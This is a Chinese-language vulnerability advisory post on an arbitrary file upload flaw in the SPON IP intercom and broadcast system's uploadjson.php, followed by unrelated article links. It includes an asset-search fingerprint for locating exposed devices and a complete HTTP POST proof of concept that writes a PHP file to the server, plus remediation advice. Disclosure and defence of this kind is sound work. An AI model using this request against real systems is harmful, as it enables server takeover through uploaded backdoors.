世邦通信 SPON IP网络对讲广播系统uploadjson.php任意文件上传漏洞

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统uploadjson.php存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限

资产测绘

icon_hash="-1830859634"

漏洞复现

ruby 复制代码
POST /php/uploadjson.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Content-Length: 61

jsondata[filename]=7788.php&jsondata[data]=<?php echo 'ok';?>

访问上传文件地址

修复建议

1、升级到安全版本

2、如非必要,禁止公网访问该系统。

3、设置白名单访问。

相关推荐
24zhgjx-fuhao6 分钟前
虚链路的配置
开发语言·网络·php
沈千秋.18 分钟前
thinkphp5.2反序列化
网络安全·php·反序列化
步十人25 分钟前
【Redis】网络高并发模型
网络·数据库·redis
2401_8924233642 分钟前
OSPF实验
网络
koo36443 分钟前
周报5.31
网络
代码小书生1 小时前
getpass,一个安全输入的 Python 库!
开发语言·python·安全
それども1 小时前
怎么理解TCP的状态
java·网络·网络协议·tcp/ip·dubbo
其实防守也摸鱼1 小时前
告别单个变量,用列表和字典批量管理你的 Python 数据
开发语言·网络·软件测试·python·web安全·数据结构,编程教程
狗凯之家源码网1 小时前
漫城 CMS2.7.1 漫画小说阅读系统二次开发分享(三端适配版)
php
欧神附体1231 小时前
计算机网络之专业名词中英文解释(第一弹)
网络